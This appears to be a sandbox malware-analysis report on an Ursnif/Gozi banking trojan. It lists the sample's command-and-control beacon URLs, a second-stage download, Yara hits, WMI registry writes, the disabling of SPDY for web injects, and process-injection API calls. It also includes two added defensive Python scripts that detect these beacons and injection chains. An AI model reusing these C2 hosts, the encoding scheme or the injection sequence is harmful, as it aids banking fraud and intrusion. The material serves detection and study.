Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 15 Feb 2021 23:58:11 GMT; Content-Type: text/html; charset=utf-8; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip; Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a (a chunked, gzip-compressed body; the Data Ascii rendering is not meaningful)
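The GETs and the POST to api10.laptok.at and api3.lepini.at above share one shape: a fixed first directory (/api1/), then a long base64-looking string chopped into pseudo-directories, with the tokens _2F and _2B standing in for the base64 characters / and + (note MB_2B0Lh_/2FdHYj, where a token is split across a slash, so the path only makes sense once the segments are joined). The block below is an added example, not part of the sandbox report, that scores proxy-log URLs on that structure alone; it assumes the bot URL-encodes the blob and swaps % for _, so it treats any _XX as an escape, and it does not attempt to decrypt the payload because the report gives no key. The log lines are constructed, with the URLs copied from this report plus benign requests also seen in it.

```python
"""Structural heuristic for ISFB/Ursnif-style beacon URIs.
Added example, not sandbox code. Assumption: the bot base64-encodes its
encrypted query, URL-encodes '/' and '+', swaps '%' for '_' (so '_2F', '_2B')
and splits the result into pseudo-directories; we reverse that and check that
what is left is a long, clean base64 string."""
import re
from typing import List, Tuple
from urllib.parse import urlsplit

_ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")          # '_2F' -> '/', '_2B' -> '+'
_BASE64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def undo_escapes(body: str) -> str:
    """Replace every '_XX' escape with the character it encodes."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), body)


def reassemble(path: str) -> str:
    """Join the pseudo-directories after the first one back into one blob.

    The first segment ('api1' in this report) is a fixed prefix; the rest is one
    string split at arbitrary points, so escapes may straddle a '/' and must be
    decoded only after joining. Returns '' for paths too short to be a beacon.
    """
    segs = [s for s in path.split("/") if s]
    if len(segs) < 4:
        return ""
    return "".join(segs[1:])


def is_isfb_like(url: str, min_len: int = 100) -> bool:
    """True when the URL path looks like an ISFB beacon (structure only)."""
    joined = reassemble(urlsplit(url).path)
    if "_2F" not in joined and "_2B" not in joined:
        return False                      # no escape tokens: not this scheme
    blob = undo_escapes(joined)
    return len(blob) >= min_len and _BASE64.match(blob) is not None


def flag_proxy_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client, url) for each 'client method url' line that matches."""
    hits = []
    for line in lines:
        client, _method, url = line.split(" ", 2)
        if is_isfb_like(url):
            hits.append((client, url))
    return hits


# Constructed proxy log: beacon URLs copied from the report, plus benign lines.
PROXY_LOG = [
    "192.168.2.4 GET http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E",
    "192.168.2.4 POST http://api3.lepini.at/api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov",
    "192.168.2.4 GET http://api10.laptok.at/favicon.ico",
    "192.168.2.4 GET http://c56.lepini.at/jvassets/xI/t64.dat",
    "192.168.2.4 GET https://www.msn.com/de-ch/?ocid=iehp",
]

if __name__ == "__main__":
    for client, url in flag_proxy_log(PROXY_LOG):
        print(client, urlsplit(url).netloc, len(undo_escapes(reassemble(urlsplit(url).path))))
```

The heuristic deliberately ignores the host name and the User-Agent, since this sample used both an IE and a Firefox string against different hosts; it also does not flag the /jvassets/xI/t64.dat download, which is a plain second-stage fetch and needs its own rule (here the Avira URL Cloud label covers it).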
Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp; String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmp; String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmp; String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown; Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown; Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match; File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match; file source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match; file source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match; file source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
Disables SPDY (turns off SPDY/3 support in Internet Explorer so browser traffic stays plain HTTP/1.1 that the user-mode hooks can read and rewrite; likely to perform web injects)
Source: C:\Windows\explorer.exe; Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY; matched rule: Win32.Gozi, author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F34D0 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033FB159 NtQueryVirtualMemory
Source: C:\Windows\explorer.exe; Code function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA1C74 NtQuerySystemInformation
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC9584 NtReadVirtualMemory
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA7D44 NtQueryInformationProcess
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC1EEC NtCreateSection
Source: C:\Windows\explorer.exe; Code function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
Source: C:\Windows\explorer.exe; Code function: 32_2_04DBEF14 NtMapViewOfSection
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCF9A4 NtAllocateVirtualMemory
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCC130 NtWriteVirtualMemory
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC9B4C NtQueryInformationProcess
Source: C:\Windows\explorer.exe; Code function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCF9A4 NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DCC130 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB1A9C NtQueryInformationProcess
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC9B4C NtQueryInformationProcess
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC9584 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DC1EEC NtCreateSection
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DBEF14 NtMapViewOfSection
Source: C:\Windows\System32\control.exe; Code function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4359B4C NtQueryInformationProcess
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\rundll32.exe; Code function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory
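The WMI StdRegProv calls, the EnableSPDY3_0 registry write and the native-API sequences listed above are the raw material an analyst turns into indicators. The following Python script is an added example and is not part of the Joe Sandbox report nor code from the Ursnif sample: it parses evidence lines in the shape this page uses (and the raw-export shape, where the process path is fused to the evidence kind and the function id is printed twice), groups them per process, separates StdRegProv read methods from write methods, and flags a process whose listed functions combine a write or section-map primitive with a remote-execution primitive, alongside the SPDY-off registry write. The sample lines are a constructed subset of the lines above; the INJECTION_STAGES grouping is this example's own heuristic, not a classification the report makes.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the evidence lines on this page. The last two are in the
# raw-export shape (process fused to kind, function id repeated) to show both forms parse.
SAMPLE_LINES = [
    r"Source: C:\Windows\explorer.exe; Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F34D0 NtMapViewOfSection",
    r"Source: C:\Windows\explorer.exe; Code function: 32_2_04DCC130 NtWriteVirtualMemory",
    r"Source: C:\Windows\explorer.exe; Code function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread",
    r"Source: C:\Windows\explorer.exeCode function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,32_2_04DAC458",
    r"Source: C:\Windows\explorer.exeCode function: 32_2_04DA74A832_2_04DA74A8",
]

SOURCE_RE = re.compile(
    r"^Source: (?P<proc>.+?\.exe);?\s*"
    r"(?P<kind>Registry key value created / modified|WMI Queries|WMI Registry write|Code function): "
    r"(?P<detail>.*)$"
)
# "<pid>_<n>_<hex>" then an optional call list; raw exports append the id again.
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]{8,16})(?:\s+(?P<apis>[\w,]*?))?,?(?P=fid)?$")
WMI_RE = re.compile(r"StdRegProv::(?P<method>\w+)")

# Heuristic grouping of calls that together realise a cross-process injection (this
# example's own table, not the report's). Query/close calls are deliberately ignored.
INJECTION_STAGES = {
    "write": {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "map": {"NtCreateSection", "NtMapViewOfSection"},
    "execute": {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
                "NtSetContextThread", "NtQueueApcThread", "QueueUserAPC"},
}


def parse_report_lines(lines):
    """Group evidence per process image: WMI registry methods, registry values, native calls."""
    procs = defaultdict(lambda: {"wmi_reads": set(), "wmi_writes": set(),
                                 "registry_values": [], "functions": {}})
    for line in lines:
        m = SOURCE_RE.match(line.strip())
        if not m:
            continue  # Yara/dump lines are out of scope for this parser
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        kind, detail = m.group("kind"), m.group("detail")
        entry = procs[proc]
        if kind.startswith("WMI"):
            w = WMI_RE.search(detail)
            if w:
                method = w.group("method")
                # StdRegProv Set*/Create*/Delete* mutate the registry with no RegSetValue
                # call in the caller; everything else only reads.
                bucket = "wmi_writes" if method.startswith(("Set", "Create", "Delete")) else "wmi_reads"
                entry[bucket].add(method)
        elif kind.startswith("Registry"):
            parts = detail.rsplit(None, 2)  # "<key path> <value name> <data>"
            if len(parts) == 3:
                entry["registry_values"].append(tuple(parts))
        else:
            f = FUNC_RE.match(detail)
            if f:
                apis = [a for a in (f.group("apis") or "").split(",") if a]
                entry["functions"][f.group("fid")] = apis
    return procs


def assess(procs):
    """Per-process findings: injection stages seen, WMI writes, SPDY switched off."""
    findings = {}
    for proc, entry in procs.items():
        apis = {a for seq in entry["functions"].values() for a in seq}
        stages = {s for s, names in INJECTION_STAGES.items() if apis & names}
        spdy_off = any(name == "EnableSPDY3_0" and data == "0"
                       for _, name, data in entry["registry_values"])
        findings[proc] = {
            "injection_stages": sorted(stages),
            # placing code (write or map) only counts as a chain once something runs it
            "injection_chain": "execute" in stages and bool(stages & {"write", "map"}),
            "wmi_registry_writes": sorted(entry["wmi_writes"]),
            "web_inject_prep": spdy_off,
        }
    return findings


if __name__ == "__main__":
    for proc, finding in assess(parse_report_lines(SAMPLE_LINES)).items():
        print(proc, finding)
```

On this report the split matters: regsvr32.exe shows only section-mapping calls and the WMI registry writes, while explorer.exe and control.exe carry the write-plus-execute combination, which is consistent with the loader handing off to an injected explorer stage before the browser hooks and the SPDY change are applied.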
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033FAF34
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F28E9
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA74A8
Source: C:\Windows\explorer.exe; Code function: 32_2_04DAC458
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC9C04
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB3438
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB7500
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA3F98
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB5890
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB2854
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA42CC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DBAACC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DAEBD0
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB6B80
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB44FC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DADC88
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC1C68
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCD468
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC7DDC
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA559C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC75B4
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC15A0
Source: C:\Windows\explorer.exe; Code function: 32_2_04DC0D40
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCED7C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA9514
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB1D14
Source: C:\Windows\explorer.exe; Code function: 32_2_04DA1D20
Source: C:\Windows\explorer.exe; Code function: 32_2_04DBBE9C
Source: C:\Windows\explorer.exe; Code function: 32_2_04DCEFD0
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB97C8
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB4F5C
